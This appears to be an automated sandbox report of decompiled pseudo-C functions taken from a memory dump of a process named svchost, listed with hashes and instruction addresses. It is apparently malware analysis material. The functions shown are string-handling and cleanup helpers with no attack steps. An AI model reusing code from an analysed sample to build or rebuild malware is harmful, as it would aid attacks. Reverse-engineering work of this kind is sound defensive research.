                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _strlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4218353326-0
                                                                                                                                                                                                                                                                            • Opcode ID: cc552e2788ec19ea4224f0d46fe881bc41ece34d1291b5b1bd72de5b41e52a96
                                                                                                                                                                                                                                                                            • Instruction ID: 6b2d4ef1dc70f01762c9ea93bfd451974196985589b21f9b2b8d381f5f98cc15
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc552e2788ec19ea4224f0d46fe881bc41ece34d1291b5b1bd72de5b41e52a96
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7791D8B4E00219DFDF44DF98D580AEEBBB1BF48318F248169E505B7381E735AA41CB56
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                                                                            			E04015C60(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                                                                                                                                            				intOrPtr* _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				void _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                                                                                                                            				intOrPtr _v88;
                                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				void* _t107;
                                                                                                                                                                                                                                                                            				intOrPtr _t115;
                                                                                                                                                                                                                                                                            				signed char _t118;
                                                                                                                                                                                                                                                                            				signed char _t124;
                                                                                                                                                                                                                                                                            				void* _t126;
                                                                                                                                                                                                                                                                            				void* _t161;
                                                                                                                                                                                                                                                                            				signed int _t183;
                                                                                                                                                                                                                                                                            				void* _t184;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t161 = __edx;
                                                                                                                                                                                                                                                                            				_t126 = __ebx;
                                                                                                                                                                                                                                                                            				_v20 =  *0x429024 ^ _t183;
                                                                                                                                                                                                                                                                            				_v76 = __ecx;
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				while(_a4 != 0) {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_v5 = 1;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_t162 = _a4;
                                                                                                                                                                                                                                                                            						_v12 = E04013F50(_t126, _v76, 0x426eaa, 0x426e9c, _a4, 0, 0xffffffff, 0,  *(_v76 + 0x19) & 0x000000ff);
                                                                                                                                                                                                                                                                            						if(_v12 != 0) {
                                                                                                                                                                                                                                                                            							_v16 = E04015360(_t126, _v76, 0x426eaa, 0x426e9c, _v12);
                                                                                                                                                                                                                                                                            							if(_v16 == 0) {
                                                                                                                                                                                                                                                                            								if( *((intOrPtr*)(_v76 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                            									_t115 = E04020CE0(8);
                                                                                                                                                                                                                                                                            									_t184 = _t184 + 4;
                                                                                                                                                                                                                                                                            									_v64 = _t115;
                                                                                                                                                                                                                                                                            									if(_v64 == 0) {
                                                                                                                                                                                                                                                                            										_v84 = 0;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_v84 = E0401F4E0(_v64);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_t162 = _v84;
                                                                                                                                                                                                                                                                            									 *((intOrPtr*)(_v76 + 0xc)) = _v84;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								memcpy( &_v52, 0x426e9c, 7 << 2);
                                                                                                                                                                                                                                                                            								asm("movsb");
                                                                                                                                                                                                                                                                            								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _t162,  &_v52, 0x1c, 0);
                                                                                                                                                                                                                                                                            								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v76, 0x426c50, 2, 0);
                                                                                                                                                                                                                                                                            								_t107 = E040070A0( *_v12);
                                                                                                                                                                                                                                                                            								_t184 = _t184 + 0x10;
                                                                                                                                                                                                                                                                            								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v12,  *_v12, _t107, 0);
                                                                                                                                                                                                                                                                            								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v76, 0x426c54, 2, 0);
                                                                                                                                                                                                                                                                            								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v76, 0x426ebc, 4, 0);
                                                                                                                                                                                                                                                                            								 *(_v76 + 0x1a) = 1;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								if( *_v16 == 0 ||  *((intOrPtr*)(_v16 + 4)) <= 0) {
                                                                                                                                                                                                                                                                            									_t118 = E0401F7C0(_t126, _a4, 0x426eaa, 0x426e9c,  *((intOrPtr*)(_v12 + 0x28)),  *((intOrPtr*)(_v12 + 0x2c)));
                                                                                                                                                                                                                                                                            									asm("sbb edx, edx");
                                                                                                                                                                                                                                                                            									 *(_v76 + 0x1a) =  ~(_t118 & 0x000000ff) + 1;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_t124 = E0401F6B0(_t126, _a4, 0x426eaa, 0x426e9c,  *((intOrPtr*)(_v12 + 0x28)),  *((intOrPtr*)(_v12 + 0x2c)),  *_v16,  *((intOrPtr*)(_v16 + 4)));
                                                                                                                                                                                                                                                                            									asm("sbb edx, edx");
                                                                                                                                                                                                                                                                            									 *(_v76 + 0x1a) =  ~(_t124 & 0x000000ff) + 1;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(_v16 != 0) {
                                                                                                                                                                                                                                                                            									_v60 = _v16;
                                                                                                                                                                                                                                                                            									_v56 = _v60;
                                                                                                                                                                                                                                                                            									if(_v56 == 0) {
                                                                                                                                                                                                                                                                            										_v80 = 0;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_v80 = E04004EA0(_v56, 1);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v16 = 0x666;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							if(_v12 != 0) {
                                                                                                                                                                                                                                                                            								_v72 = _v12;
                                                                                                                                                                                                                                                                            								_v68 = _v72;
                                                                                                                                                                                                                                                                            								if(_v68 == 0) {
                                                                                                                                                                                                                                                                            									_v88 = 0;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v88 = E04006780(_v68, 1);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v12 = 0x666;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} while (_v12 != 0 && ( *(_v76 + 0x1a) & 0x000000ff) == 0);
                                                                                                                                                                                                                                                                            					asm("sbb ecx, ecx");
                                                                                                                                                                                                                                                                            					_v5 =  ~( *(_v76 + 0x1a) & 0x000000ff) + 1;
                                                                                                                                                                                                                                                                            					_t161 = 0;
                                                                                                                                                                                                                                                                            					if(0 != 0) {
                                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L30:
                                                                                                                                                                                                                                                                            					return E04006C8C(_v5, _t126, _v20 ^ _t183, _t161, 0x426eaa, 0x426e9c);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L30;
                                                                                                                                                                                                                                                                            			}



























                                                                                                                                                                                                                                                                            0x04015c60
                                                                                                                                                                                                                                                                            0x04015c60
                                                                                                                                                                                                                                                                            0x04015c6d
                                                                                                                                                                                                                                                                            0x04015c72
                                                                                                                                                                                                                                                                            0x04015c75
                                                                                                                                                                                                                                                                            0x04015c79
                                                                                                                                                                                                                                                                            0x04015c84
                                                                                                                                                                                                                                                                            0x04015c8b
                                                                                                                                                                                                                                                                            0x04015c8f
                                                                                                                                                                                                                                                                            0x04015c9d
                                                                                                                                                                                                                                                                            0x04015ca9
                                                                                                                                                                                                                                                                            0x04015cb0
                                                                                                                                                                                                                                                                            0x04015cc2
                                                                                                                                                                                                                                                                            0x04015cc9
                                                                                                                                                                                                                                                                            0x04015d7c
                                                                                                                                                                                                                                                                            0x04015d80
                                                                                                                                                                                                                                                                            0x04015d85
                                                                                                                                                                                                                                                                            0x04015d88
                                                                                                                                                                                                                                                                            0x04015d8f
                                                                                                                                                                                                                                                                            0x04015d9e
                                                                                                                                                                                                                                                                            0x04015d91
                                                                                                                                                                                                                                                                            0x04015d99
                                                                                                                                                                                                                                                                            0x04015d99
                                                                                                                                                                                                                                                                            0x04015da8
                                                                                                                                                                                                                                                                            0x04015dab
                                                                                                                                                                                                                                                                            0x04015dab
                                                                                                                                                                                                                                                                            0x04015dbb
                                                                                                                                                                                                                                                                            0x04015dbd
                                                                                                                                                                                                                                                                            0x04015dcc
                                                                                                                                                                                                                                                                            0x04015de0
                                                                                                                                                                                                                                                                            0x04015ded
                                                                                                                                                                                                                                                                            0x04015df2
                                                                                                                                                                                                                                                                            0x04015e02
                                                                                                                                                                                                                                                                            0x04015e16
                                                                                                                                                                                                                                                                            0x04015e2a
                                                                                                                                                                                                                                                                            0x04015e32
                                                                                                                                                                                                                                                                            0x04015ccf
                                                                                                                                                                                                                                                                            0x04015cd5
                                                                                                                                                                                                                                                                            0x04015d26
                                                                                                                                                                                                                                                                            0x04015d30
                                                                                                                                                                                                                                                                            0x04015d38
                                                                                                                                                                                                                                                                            0x04015ce0
                                                                                                                                                                                                                                                                            0x04015cfe
                                                                                                                                                                                                                                                                            0x04015d08
                                                                                                                                                                                                                                                                            0x04015d10
                                                                                                                                                                                                                                                                            0x04015d10
                                                                                                                                                                                                                                                                            0x04015d3f
                                                                                                                                                                                                                                                                            0x04015d44
                                                                                                                                                                                                                                                                            0x04015d4a
                                                                                                                                                                                                                                                                            0x04015d51
                                                                                                                                                                                                                                                                            0x04015d62
                                                                                                                                                                                                                                                                            0x04015d53
                                                                                                                                                                                                                                                                            0x04015d5d
                                                                                                                                                                                                                                                                            0x04015d5d
                                                                                                                                                                                                                                                                            0x04015d69
                                                                                                                                                                                                                                                                            0x04015d69
                                                                                                                                                                                                                                                                            0x04015d70
                                                                                                                                                                                                                                                                            0x04015e3a
                                                                                                                                                                                                                                                                            0x04015e3f
                                                                                                                                                                                                                                                                            0x04015e45
                                                                                                                                                                                                                                                                            0x04015e4c
                                                                                                                                                                                                                                                                            0x04015e5d
                                                                                                                                                                                                                                                                            0x04015e4e
                                                                                                                                                                                                                                                                            0x04015e58
                                                                                                                                                                                                                                                                            0x04015e58
                                                                                                                                                                                                                                                                            0x04015e64
                                                                                                                                                                                                                                                                            0x04015e64
                                                                                                                                                                                                                                                                            0x04015e3a
                                                                                                                                                                                                                                                                            0x04015e6b
                                                                                                                                                                                                                                                                            0x04015e89
                                                                                                                                                                                                                                                                            0x04015e8e
                                                                                                                                                                                                                                                                            0x04015e91
                                                                                                                                                                                                                                                                            0x04015e93
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04015e99
                                                                                                                                                                                                                                                                            0x04015eab
                                                                                                                                                                                                                                                                            0x04015eab
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: codecvt
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3662085145-0
                                                                                                                                                                                                                                                                            • Opcode ID: 02833dcf54a586269b43c7a5692cfb048f7b9c5c918048c8dbaad8ebd72bbd88
                                                                                                                                                                                                                                                                            • Instruction ID: 8b2e742d592aba65153c7364a6cd7b1473e8eb5661a5a9f51c834e1a389ae5c1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02833dcf54a586269b43c7a5692cfb048f7b9c5c918048c8dbaad8ebd72bbd88
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87811A74E04218EFEB58DF94D894BADBBB2AF88318F148159E4057F3A1C775B986CB40
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                                                                                                                            			E040126B0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                                            				void* _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				intOrPtr* _v76;
                                                                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                                                            				intOrPtr _t69;
                                                                                                                                                                                                                                                                            				intOrPtr _t70;
                                                                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                                                            				void* _t101;
                                                                                                                                                                                                                                                                            				void* _t102;
                                                                                                                                                                                                                                                                            				signed int _t103;
                                                                                                                                                                                                                                                                            				void* _t104;
                                                                                                                                                                                                                                                                            				void* _t105;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t102 = __esi;
                                                                                                                                                                                                                                                                            				_t101 = __edi;
                                                                                                                                                                                                                                                                            				_t79 = __ebx;
                                                                                                                                                                                                                                                                            				_v16 =  *0x429024 ^ _t103;
                                                                                                                                                                                                                                                                            				_v72 = __ecx;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                            					_v40 =  *0x426f90;
                                                                                                                                                                                                                                                                            					_v36 =  *0x426f94;
                                                                                                                                                                                                                                                                            					_v32 =  *0x426f98;
                                                                                                                                                                                                                                                                            					_v28 =  *0x426f9c;
                                                                                                                                                                                                                                                                            					_v24 =  *0x426fa0;
                                                                                                                                                                                                                                                                            					_v20 =  *0x426fa4;
                                                                                                                                                                                                                                                                            					_t59 = E04020CE0(8);
                                                                                                                                                                                                                                                                            					_t104 = _t104 + 4;
                                                                                                                                                                                                                                                                            					_v52 = _t59;
                                                                                                                                                                                                                                                                            					if(_v52 == 0) {
                                                                                                                                                                                                                                                                            						_v76 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_v76 = E0401F4E0(_v52);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v12 = _v76;
                                                                                                                                                                                                                                                                            					E0401FC90(_t79, _v12, _t101, _t102,  &_v40, 0x14);
                                                                                                                                                                                                                                                                            					_t99 = _v12;
                                                                                                                                                                                                                                                                            					if((E04015C60(_t79, _v72, _v12, _v12) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_v48 = 0;
                                                                                                                                                                                                                                                                            						_t99 = _v12;
                                                                                                                                                                                                                                                                            						_t69 = E0401BCB0(_t101, 3,  *_v12,  &_v48);
                                                                                                                                                                                                                                                                            						_t104 = _t104 + 0xc;
                                                                                                                                                                                                                                                                            						_v44 = _t69;
                                                                                                                                                                                                                                                                            						if(_v44 > 0) {
                                                                                                                                                                                                                                                                            							_t70 = E04020CE0(8);
                                                                                                                                                                                                                                                                            							_t105 = _t104 + 4;
                                                                                                                                                                                                                                                                            							_v56 = _t70;
                                                                                                                                                                                                                                                                            							if(_v56 == 0) {
                                                                                                                                                                                                                                                                            								_v80 = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v80 = E0401F4E0(_v56);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v8 = _v80;
                                                                                                                                                                                                                                                                            							_t72 = E040070A0( *((intOrPtr*)( *_v48 + 4)));
                                                                                                                                                                                                                                                                            							_t104 = _t105 + 4;
                                                                                                                                                                                                                                                                            							_t99 = _v48;
                                                                                                                                                                                                                                                                            							E0401FC90(_t79, _v8, _t101, _t102,  *((intOrPtr*)( *_v48 + 4)), _t72);
                                                                                                                                                                                                                                                                            							if(_v48 != 0) {
                                                                                                                                                                                                                                                                            								_t99 = _v48;
                                                                                                                                                                                                                                                                            								_v60 = _v48;
                                                                                                                                                                                                                                                                            								E04020CC0(_v60);
                                                                                                                                                                                                                                                                            								_t104 = _t104 + 4;
                                                                                                                                                                                                                                                                            								_v48 = 0x666;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v68 = _v12;
                                                                                                                                                                                                                                                                            						_t99 = _v68;
                                                                                                                                                                                                                                                                            						_v64 = _v68;
                                                                                                                                                                                                                                                                            						if(_v64 == 0) {
                                                                                                                                                                                                                                                                            							_v84 = 0;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v84 = E04004EA0(_v64, 1);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v12 = 0x666;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} while (0 != 0);
                                                                                                                                                                                                                                                                            				return E04006C8C(_v8, _t79, _v16 ^ _t103, _t99, _t101, _t102);
                                                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                                                            0x040126b0
                                                                                                                                                                                                                                                                            0x040126b0
                                                                                                                                                                                                                                                                            0x040126b0
                                                                                                                                                                                                                                                                            0x040126bd
                                                                                                                                                                                                                                                                            0x040126c0
                                                                                                                                                                                                                                                                            0x040126c3
                                                                                                                                                                                                                                                                            0x040126ca
                                                                                                                                                                                                                                                                            0x040126cf
                                                                                                                                                                                                                                                                            0x040126d8
                                                                                                                                                                                                                                                                            0x040126e1
                                                                                                                                                                                                                                                                            0x040126e9
                                                                                                                                                                                                                                                                            0x040126f2
                                                                                                                                                                                                                                                                            0x040126fb
                                                                                                                                                                                                                                                                            0x04012700
                                                                                                                                                                                                                                                                            0x04012705
                                                                                                                                                                                                                                                                            0x04012708
                                                                                                                                                                                                                                                                            0x0401270f
                                                                                                                                                                                                                                                                            0x0401271e
                                                                                                                                                                                                                                                                            0x04012711
                                                                                                                                                                                                                                                                            0x04012719
                                                                                                                                                                                                                                                                            0x04012719
                                                                                                                                                                                                                                                                            0x04012728
                                                                                                                                                                                                                                                                            0x04012734
                                                                                                                                                                                                                                                                            0x04012739
                                                                                                                                                                                                                                                                            0x0401274a
                                                                                                                                                                                                                                                                            0x04012750
                                                                                                                                                                                                                                                                            0x0401275b
                                                                                                                                                                                                                                                                            0x04012763
                                                                                                                                                                                                                                                                            0x04012768
                                                                                                                                                                                                                                                                            0x0401276b
                                                                                                                                                                                                                                                                            0x04012772
                                                                                                                                                                                                                                                                            0x04012776
                                                                                                                                                                                                                                                                            0x0401277b
                                                                                                                                                                                                                                                                            0x0401277e
                                                                                                                                                                                                                                                                            0x04012785
                                                                                                                                                                                                                                                                            0x04012794
                                                                                                                                                                                                                                                                            0x04012787
                                                                                                                                                                                                                                                                            0x0401278f
                                                                                                                                                                                                                                                                            0x0401278f
                                                                                                                                                                                                                                                                            0x0401279e
                                                                                                                                                                                                                                                                            0x040127aa
                                                                                                                                                                                                                                                                            0x040127af
                                                                                                                                                                                                                                                                            0x040127b3
                                                                                                                                                                                                                                                                            0x040127bf
                                                                                                                                                                                                                                                                            0x040127c8
                                                                                                                                                                                                                                                                            0x040127ca
                                                                                                                                                                                                                                                                            0x040127cd
                                                                                                                                                                                                                                                                            0x040127d4
                                                                                                                                                                                                                                                                            0x040127d9
                                                                                                                                                                                                                                                                            0x040127dc
                                                                                                                                                                                                                                                                            0x040127dc
                                                                                                                                                                                                                                                                            0x040127c8
                                                                                                                                                                                                                                                                            0x04012772
                                                                                                                                                                                                                                                                            0x040127e7
                                                                                                                                                                                                                                                                            0x040127ec
                                                                                                                                                                                                                                                                            0x040127ef
                                                                                                                                                                                                                                                                            0x040127f2
                                                                                                                                                                                                                                                                            0x040127f9
                                                                                                                                                                                                                                                                            0x0401280a
                                                                                                                                                                                                                                                                            0x040127fb
                                                                                                                                                                                                                                                                            0x04012805
                                                                                                                                                                                                                                                                            0x04012805
                                                                                                                                                                                                                                                                            0x04012811
                                                                                                                                                                                                                                                                            0x04012811
                                                                                                                                                                                                                                                                            0x04012818
                                                                                                                                                                                                                                                                            0x04012830

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04012714
                                                                                                                                                                                                                                                                            • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0401278A
                                                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 040127AA
                                                                                                                                                                                                                                                                            • codecvt.LIBCPMTD ref: 04012800
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Iterator_baseIterator_base::_std::_$_strlencodecvt
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4053968246-0
                                                                                                                                                                                                                                                                            • Opcode ID: 169dd0bcd0e1bc8557198bf3e789645acc63f33ee09107aa3db1908fa965f152
                                                                                                                                                                                                                                                                            • Instruction ID: af42a25bd155b3b5d7a86e069f6b5acb66482dcb96fdedbe39403f86dc1ab7a6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 169dd0bcd0e1bc8557198bf3e789645acc63f33ee09107aa3db1908fa965f152
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4951D6B4E01208AFEB14DFA4E984BEEBBB1BF48308F108169E815B73A0D7716945CF55
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E04014EC0(intOrPtr __ecx) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v40 = __ecx;
                                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v40 + 4)) != 0) {
                                                                                                                                                                                                                                                                            					_v12 =  *((intOrPtr*)(_v40 + 4));
                                                                                                                                                                                                                                                                            					_v8 = _v12;
                                                                                                                                                                                                                                                                            					if(_v8 == 0) {
                                                                                                                                                                                                                                                                            						_v44 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_v44 = E04006720(_v8, 1);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_v40 + 4)) = 0x666;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v40 + 8)) != 0) {
                                                                                                                                                                                                                                                                            					_v20 =  *((intOrPtr*)(_v40 + 8));
                                                                                                                                                                                                                                                                            					_v16 = _v20;
                                                                                                                                                                                                                                                                            					if(_v16 == 0) {
                                                                                                                                                                                                                                                                            						_v48 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_v48 = E04006750(_v16, 1);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_v40 + 8)) = 0x666;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v40 + 0xc)) != 0) {
                                                                                                                                                                                                                                                                            					_v28 =  *((intOrPtr*)(_v40 + 0xc));
                                                                                                                                                                                                                                                                            					_v24 = _v28;
                                                                                                                                                                                                                                                                            					if(_v24 == 0) {
                                                                                                                                                                                                                                                                            						_v52 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_v52 = E04004EA0(_v24, 1);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_v40 + 0xc)) = 0x666;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t55 = _v40;
                                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t55 + 0x20)) != 0) {
                                                                                                                                                                                                                                                                            					_v36 =  *((intOrPtr*)(_v40 + 0x20));
                                                                                                                                                                                                                                                                            					_t56 = _v36;
                                                                                                                                                                                                                                                                            					_v32 = _t56;
                                                                                                                                                                                                                                                                            					if(_v32 == 0) {
                                                                                                                                                                                                                                                                            						_v56 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t56 = E04004EA0(_v32, 1);
                                                                                                                                                                                                                                                                            						_v56 = _t56;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_v40 + 0x20)) = 0x666;
                                                                                                                                                                                                                                                                            					return _t56;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t55;
                                                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                                                            0x04014ec6
                                                                                                                                                                                                                                                                            0x04014ed0
                                                                                                                                                                                                                                                                            0x04014ed8
                                                                                                                                                                                                                                                                            0x04014ede
                                                                                                                                                                                                                                                                            0x04014ee5
                                                                                                                                                                                                                                                                            0x04014ef6
                                                                                                                                                                                                                                                                            0x04014ee7
                                                                                                                                                                                                                                                                            0x04014ef1
                                                                                                                                                                                                                                                                            0x04014ef1
                                                                                                                                                                                                                                                                            0x04014f00
                                                                                                                                                                                                                                                                            0x04014f00
                                                                                                                                                                                                                                                                            0x04014f0e
                                                                                                                                                                                                                                                                            0x04014f16
                                                                                                                                                                                                                                                                            0x04014f1c
                                                                                                                                                                                                                                                                            0x04014f23
                                                                                                                                                                                                                                                                            0x04014f34
                                                                                                                                                                                                                                                                            0x04014f25
                                                                                                                                                                                                                                                                            0x04014f2f
                                                                                                                                                                                                                                                                            0x04014f2f
